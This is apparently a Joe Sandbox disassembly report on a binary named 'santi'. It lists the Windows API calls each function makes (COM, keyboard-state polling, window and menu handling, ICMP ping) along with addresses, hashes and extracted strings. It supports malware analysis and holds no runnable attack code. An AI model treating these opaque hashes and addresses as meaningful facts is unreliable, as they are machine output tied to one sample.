                                                                • CoCreateInstance.OLE32(0036DA8C,00000000,00000001,00393CF8,?), ref: 0033043E
                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003304AD
                                                                • CoTaskMemFree.OLE32(?,?), ref: 00330505
                                                                • _memset.LIBCMT ref: 00330542
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0033057E
                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003305A1
                                                                • CoTaskMemFree.OLE32(00000000), ref: 003305A8
                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003305DF
                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 003305E1
                                                                Similarity
                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                • String ID:
                                                                • API String ID: 1246142700-0
                                                                • Opcode ID: e4967d4462fdb8a5c4e6077585f07b30649479ab625d224f26df7702d4f2a26f
                                                                • Instruction ID: 805e9b79cfeb853c389ca433010342947972b13bec9ae44b8ce8060abdaf5815
                                                                • Instruction Fuzzy Hash: 63B1E774A00208AFDB05DFA5C898DAEBBB9FF48304F1484A9E906EB251DB70ED41CF50
                                                                APIs
                                                                • GetKeyboardState.USER32(?), ref: 00322ED6
                                                                • SetKeyboardState.USER32(?), ref: 00322F41
                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00322F61
                                                                • GetKeyState.USER32(000000A0), ref: 00322F78
                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00322FA7
                                                                • GetKeyState.USER32(000000A1), ref: 00322FB8
                                                                • GetAsyncKeyState.USER32(00000011), ref: 00322FE4
                                                                • GetKeyState.USER32(00000011), ref: 00322FF2
                                                                • GetAsyncKeyState.USER32(00000012), ref: 0032301B
                                                                • GetKeyState.USER32(00000012), ref: 00323029
                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00323052
                                                                • GetKeyState.USER32(0000005B), ref: 00323060
                                                                Similarity
                                                                • API ID: State$Async$Keyboard
                                                                • String ID:
                                                                • API String ID: 541375521-0
                                                                • Opcode ID: 1d5581f3a0939e2fc51ea5f714b2399da1b9d1de0a53b995d5a406688bb777e3
                                                                • Instruction ID: 1568ef1961e4c2ae0bc20be908ad4742bc74ea9034b717edd428c800273df005
                                                                • Instruction Fuzzy Hash: 2951D870A047A439FB37DBA4A9107EBBBB45F11340F0A859DD5C25A1C2DA949B4CCBA2
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000001), ref: 0031ED1E
                                                                • GetWindowRect.USER32(00000000,?), ref: 0031ED30
                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0031ED8E
                                                                • GetDlgItem.USER32(?,00000002), ref: 0031ED99
                                                                • GetWindowRect.USER32(00000000,?), ref: 0031EDAB
                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0031EE01
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0031EE0F
                                                                • GetWindowRect.USER32(00000000,?), ref: 0031EE20
                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0031EE63
                                                                • GetDlgItem.USER32(?,000003EA), ref: 0031EE71
                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0031EE8E
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0031EE9B
                                                                Similarity
                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                • String ID:
                                                                • API String ID: 3096461208-0
                                                                • Opcode ID: ccdeb124d3a9b6834cc9ad84b0e54b6165ca30b6a4f600bce4d65797acd1b9ca
                                                                • Instruction ID: 02c57a1c7759299c47e4b11bcef25dbad4449517b9f34b372df52d303927c6f8
                                                                • Instruction Fuzzy Hash: C2513471B00205AFDF19CF69DD89AAEBBBAFB88700F55812DF919D7290D7B19D408B10
                                                                APIs
                                                                  • Part of subcall function 002FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002FB759,?,00000000,?,?,?,?,002FB72B,00000000,?), ref: 002FBA58
                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,002FB72B), ref: 002FB7F6
                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,002FB72B,00000000,?,?,002FB2EF,?,?), ref: 002FB88D
                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0035D8A6
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002FB72B,00000000,?,?,002FB2EF,?,?), ref: 0035D8D7
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002FB72B,00000000,?,?,002FB2EF,?,?), ref: 0035D8EE
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002FB72B,00000000,?,?,002FB2EF,?,?), ref: 0035D90A
                                                                • DeleteObject.GDI32(00000000), ref: 0035D91C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                • String ID:
                                                                • API String ID: 641708696-0
                                                                • Opcode ID: 45bd65b3596c727c6e510f6d11b18c9ddd026673eb082d467f1d16102ab40787
                                                                • Instruction ID: decae0c99e64925a5d55b95d5f477440d86a38adefdd70f7fd3f355bf63cd5e1
                                                                • Opcode Fuzzy Hash: 45bd65b3596c727c6e510f6d11b18c9ddd026673eb082d467f1d16102ab40787
                                                                • Instruction Fuzzy Hash: 65619A31920605CFDB379F14D988B35F7B9FB95392F154129EA428AA70C7B0A8A4DF80
                                                                APIs
                                                                  • Part of subcall function 002FB526: GetWindowLongW.USER32(?,000000EB), ref: 002FB537
                                                                • GetSysColor.USER32(0000000F), ref: 002FB438
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ColorLongWindow
                                                                • String ID:
                                                                • API String ID: 259745315-0
                                                                • Opcode ID: b83021e62c286b2bea28a3534e3dd58dbedbcd27dd11b8ebf1736d70d72ab3aa
                                                                • Instruction ID: 8422ac9de5f398de337c6ecf1180cf2e61429d8df29d9144438380b2f0f1c350
                                                                • Opcode Fuzzy Hash: b83021e62c286b2bea28a3534e3dd58dbedbcd27dd11b8ebf1736d70d72ab3aa
                                                                • Instruction Fuzzy Hash: 1E41C130510148AFDF235F28DD99FB97B6AAB06771F188261FE658A1E2C7B08C51CB21
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                • String ID:
                                                                • API String ID: 136442275-0
                                                                • Opcode ID: c1141e86166efc23b02af0a1b2a28bbd95baba8554c5fc25b8e6ad2b7dd5471d
                                                                • Instruction ID: fb17820fb85a73430ff8084b8806bb03c2d8575474f38b39d1ce14cb6c3e2426
                                                                • Opcode Fuzzy Hash: c1141e86166efc23b02af0a1b2a28bbd95baba8554c5fc25b8e6ad2b7dd5471d
                                                                • Instruction Fuzzy Hash: 3E411CB684612CAEDF66DB90DC56DDF73BCAF44300F0041A6B659A6091EA30ABE48F50
                                                                APIs
                                                                • CharLowerBuffW.USER32(0037DC00,0037DC00,0037DC00), ref: 0032D7CE
                                                                • GetDriveTypeW.KERNEL32(?,00393A70,00000061), ref: 0032D898
                                                                • _wcscpy.LIBCMT ref: 0032D8C2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                • API String ID: 2820617543-1000479233
                                                                • Opcode ID: b0cfe4d52c7e6f8a5bd8853ededd1ca9354123aa69f12d2747ef01f35612a069
                                                                • Instruction ID: 8cb6e9ee2a3fd3a97dbf77720d52781de4efba166d155a64f4b8630da2e18463
                                                                • Opcode Fuzzy Hash: b0cfe4d52c7e6f8a5bd8853ededd1ca9354123aa69f12d2747ef01f35612a069
                                                                • Instruction Fuzzy Hash: BE510434114344AFC702EF14E881AAFB3A5EF80714F61882EF59A572A2DB31DD15CF42
                                                                APIs
                                                                • __swprintf.LIBCMT ref: 002E93AB
                                                                • __itow.LIBCMT ref: 002E93DF
                                                                  • Part of subcall function 00301557: _xtow@16.LIBCMT ref: 00301578
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __itow__swprintf_xtow@16
                                                                • String ID: %.15g$0x%p$False$True
                                                                • API String ID: 1502193981-2263619337
                                                                • Opcode ID: 385b2f58458763fceeb6253f22d3019934f7ac0c571f6d1f71bfe7bdf3b949b1
                                                                • Instruction ID: 27f8731bea08c32e4a8e22d70fc1822c975a0fab48674d99f5a03a0ddd3dab3b
                                                                • Opcode Fuzzy Hash: 385b2f58458763fceeb6253f22d3019934f7ac0c571f6d1f71bfe7bdf3b949b1
                                                                • Instruction Fuzzy Hash: 12413671524204ABDB29EF75D941E6AB3E8EF88304F2044AFE549C72D1EA71D995CB10
                                                                APIs
                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0034A259
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0034A260
                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0034A273
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0034A27B
                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0034A286
                                                                • DeleteDC.GDI32(00000000), ref: 0034A28F
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0034A299
                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0034A2AD
                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0034A2B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                • String ID: static
                                                                • API String ID: 2559357485-2160076837
                                                                • Opcode ID: b669c28eee878409756d35042fefadbeb77024dee9237a1b69d291545c7b3bc8
                                                                • Instruction ID: 9c19238c4e5141dac14230aa49d8316c6e446d36c0b88837a2c4e77ccfab25ba
                                                                • Opcode Fuzzy Hash: b669c28eee878409756d35042fefadbeb77024dee9237a1b69d291545c7b3bc8
                                                                • Instruction Fuzzy Hash: 23318E31640115ABDF125FA4DC49FEA3BADFF0E360F114214FA19AA0A0C7B5E811DB64
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                • String ID: 0.0.0.0
                                                                • API String ID: 2620052-3771769585
                                                                • Opcode ID: 0d3683306b70cae18226f28c46b0863a88dc7c545bd3a64410cd9e2cbe8cdeb1
                                                                • Instruction ID: bbd6102150d8f7314b0020f1ffdab3a798c27b01e723906afa9e4e11005d7143
                                                                • Opcode Fuzzy Hash: 0d3683306b70cae18226f28c46b0863a88dc7c545bd3a64410cd9e2cbe8cdeb1
                                                                • Instruction Fuzzy Hash: CA11E771A04129BBCF27AB70BD4AEDA77ACEF40710F014065F115A6091EFB49A818B61
                                                                APIs
                                                                • _memset.LIBCMT ref: 00305047
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • __gmtime64_s.LIBCMT ref: 003050E0
                                                                • __gmtime64_s.LIBCMT ref: 00305116
                                                                • __gmtime64_s.LIBCMT ref: 00305133
                                                                • __allrem.LIBCMT ref: 00305189
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003051A5
                                                                • __allrem.LIBCMT ref: 003051BC
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003051DA
                                                                • __allrem.LIBCMT ref: 003051F1
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030520F
                                                                • __invoke_watson.LIBCMT ref: 00305280
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                • String ID:
                                                                • API String ID: 384356119-0
                                                                • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                • Instruction ID: cc717eddaef0f47af9f63ec15f162be888c9daa89f06c3a4805271c5ac65ba06
                                                                • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                • Instruction Fuzzy Hash: F671F971A02B16ABDB16AE78CC61B9F73ACBF14364F154529F510DA6C1E770D9408FD0
                                                                APIs
                                                                • _memset.LIBCMT ref: 00324DF8
                                                                • GetMenuItemInfoW.USER32(003A1708,000000FF,00000000,00000030), ref: 00324E59
                                                                • SetMenuItemInfoW.USER32(003A1708,00000004,00000000,00000030), ref: 00324E8F
                                                                • Sleep.KERNEL32(000001F4), ref: 00324EA1
                                                                • GetMenuItemCount.USER32(?), ref: 00324EE5
                                                                • GetMenuItemID.USER32(?,00000000), ref: 00324F01
                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00324F2B
                                                                • GetMenuItemID.USER32(?,?), ref: 00324F70
                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00324FB6
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00324FCA
                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00324FEB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                • String ID:
                                                                • API String ID: 4176008265-0
                                                                • Opcode ID: 9017dfc042d424a69fc05e15d154c82a77dfa4b44ca3c5f8b56ad8dad2ae3d26
                                                                • Instruction ID: 22915f2201e438325ff6d46df9b7a019f8eff1a5be1e57603c61608e7ba90bb0
                                                                • Opcode Fuzzy Hash: 9017dfc042d424a69fc05e15d154c82a77dfa4b44ca3c5f8b56ad8dad2ae3d26
                                                                • Instruction Fuzzy Hash: C561A271A00269AFDB13CFA4E988AAE7BBCFB45304F154059F542A7291D771AD05CB21
                                                                APIs
                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00349C98
                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00349C9B
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00349CBF
                                                                • _memset.LIBCMT ref: 00349CD0
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00349CE2
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00349D5A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$LongWindow_memset
                                                                • String ID:
                                                                • API String ID: 830647256-0
                                                                • Opcode ID: 8b2f9ec55b91bf68589ab2c8d216eaf1be65c52311003d3ffb30fe6b1e670a7b
                                                                • Instruction ID: 79b94347ad150faa17f88ecec47c4fa84fbbc96319515bfc26e8724e564d761a
                                                                • Opcode Fuzzy Hash: 8b2f9ec55b91bf68589ab2c8d216eaf1be65c52311003d3ffb30fe6b1e670a7b
                                                                • Instruction Fuzzy Hash: 52614975900208AFDB22DFA8CC81EEEB7F8EB09714F14415AFA15EB2A1D774AD41DB50
                                                                APIs
                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003194FE
                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00319549
                                                                • VariantInit.OLEAUT32(?), ref: 0031955B
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0031957B
                                                                • VariantCopy.OLEAUT32(?,?), ref: 003195BE
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 003195D2
                                                                • VariantClear.OLEAUT32(?), ref: 003195E7
                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 003195F4
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003195FD
                                                                • VariantClear.OLEAUT32(?), ref: 0031960F
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0031961A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                • String ID:
                                                                • API String ID: 2706829360-0
                                                                • Opcode ID: 5a34ff93fc556e1fef9a31650e757ca2f922c251d55afd0e1ece1b75dbf30a1d
                                                                • Instruction ID: 2ddc4979721d793ba10e370250d34f3056fbaa94ad19b51a4303e3327ba83d1e
                                                                • Opcode Fuzzy Hash: 5a34ff93fc556e1fef9a31650e757ca2f922c251d55afd0e1ece1b75dbf30a1d
                                                                • Instruction Fuzzy Hash: DE412C31E00219AFCB06DFA5DC54AEEBB79FF08354F108066E502A7251DF74AA95CBA1
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$_memset
                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?9$|?9
                                                                • API String ID: 2862541840-2994141935
                                                                • Opcode ID: 71d73dae5c89e6ab51b37b8e84243e6574ccd93d0fab7af05786c9619adacf06
                                                                • Instruction ID: 03d576d0f91c47ee6b7f494645ed3af3a4900fb2b81a4bf65c96f255733f50ae
                                                                • Opcode Fuzzy Hash: 71d73dae5c89e6ab51b37b8e84243e6574ccd93d0fab7af05786c9619adacf06
                                                                • Instruction Fuzzy Hash: 84919071A00219EBDF26DF95C884FAEFBB8EF45710F118159F615AB280DB709944CFA0
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • CoInitialize.OLE32 ref: 0033ADF6
                                                                • CoUninitialize.OLE32 ref: 0033AE01
                                                                • CoCreateInstance.OLE32(?,00000000,00000017,0036D8FC,?), ref: 0033AE61
                                                                • IIDFromString.OLE32(?,?), ref: 0033AED4
                                                                • VariantInit.OLEAUT32(?), ref: 0033AF6E
                                                                • VariantClear.OLEAUT32(?), ref: 0033AFCF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                • API String ID: 834269672-1287834457
                                                                • Opcode ID: 931a6e7fc5cf59214048555c6aae3bad1120e2dcb7e09512784f6529b21547ea
                                                                • Instruction ID: 97dc70c00890fca3a846e4b753403ce63400634b5310c59d2914ed88a3a27fa1
                                                                • Opcode Fuzzy Hash: 931a6e7fc5cf59214048555c6aae3bad1120e2dcb7e09512784f6529b21547ea
                                                                • Instruction Fuzzy Hash: A5619C71608B11AFD712DF54C888B6AB7E8AF89714F10451DF9859B2A1C770ED48CB93
                                                                APIs
                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00338168
                                                                • inet_addr.WSOCK32(?,?,?), ref: 003381AD
                                                                • gethostbyname.WSOCK32(?), ref: 003381B9
                                                                • IcmpCreateFile.IPHLPAPI ref: 003381C7
                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00338237
                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0033824D
                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003382C2
                                                                • WSACleanup.WSOCK32 ref: 003382C8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
